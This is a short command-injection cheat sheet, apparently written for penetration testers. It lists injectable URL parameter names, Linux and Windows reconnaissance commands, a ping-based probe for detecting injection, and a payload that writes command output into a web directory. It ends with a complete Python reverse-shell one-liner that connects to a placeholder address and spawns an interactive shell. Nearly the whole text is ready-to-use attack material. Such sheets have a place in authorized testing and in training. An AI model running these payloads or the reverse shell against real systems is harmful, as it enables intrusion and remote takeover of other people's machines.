💉 Command Injection

Parameters

?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Linux Commands

whoami
uname -a
ifconfig
netstat -an
ps -ef

Windows Commands

whoami
ver
ipconfig /all
netstat -an
tasklist

Command Injection Detection

& ping -c 10 127.0.0.1 &

Exploiting Command Injection

& whoami > /var/www/static/whoami.txt &

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP-Address>",<Port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
